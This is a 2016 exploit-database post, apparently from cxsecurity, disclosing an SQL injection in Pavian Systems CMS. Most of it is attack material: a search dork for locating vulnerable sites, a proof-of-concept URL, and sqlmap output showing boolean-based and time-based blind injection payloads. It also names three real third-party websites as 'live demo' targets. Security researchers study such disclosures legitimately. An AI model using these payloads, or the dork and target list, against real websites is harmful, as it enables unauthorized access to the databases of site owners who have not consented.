Pavian Systems CMS SQL injection Vulnerability

2016.10.05
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### # Exploit Title : Pavian Systems CMS SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Vendor Homepage : http://paviansystems.com/ # Dork : All Rights Reserved. Design by paviansystems. # Tested on: [ WINDOWS 7] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 05/10/2016 # video Proof : https://youtu.be/1CyISmcwJiU ###################### # [<] DESCRIPTION : ###################### # [+] Pavian Computer Systems is leading web and software development company # [+] that focuses on the areas that are critical to achieving maximum efficiency in IT Environment Utilization # [+] AND an SQL injection has been Detected in Pavian Systems CMS ###################### # [<] Poc : ###################### # [ALL] Parameters Vulnerable To SQLi # http://localhost/allp.php?id=[SQLi] ###################### # [<] SQLmap PoC: ###################### # GET parameter 'product_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N # sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests: # --- # Parameter: product_id (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: product_id=38' AND 2172=2172 AND 'vXuF'='vXuF # # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: product_id=38' AND SLEEP(5) AND 'nneA'='nneA # --- ###################### # [<] Live Demo : ###################### # http://cit84.com/reflections_detail.php?artid=2 # http://www.growingcrops.in/services.php?id=54 # http://www.vgaexports.com/product_detail.php?product_id=38 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://youtu.be/1CyISmcwJiU


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top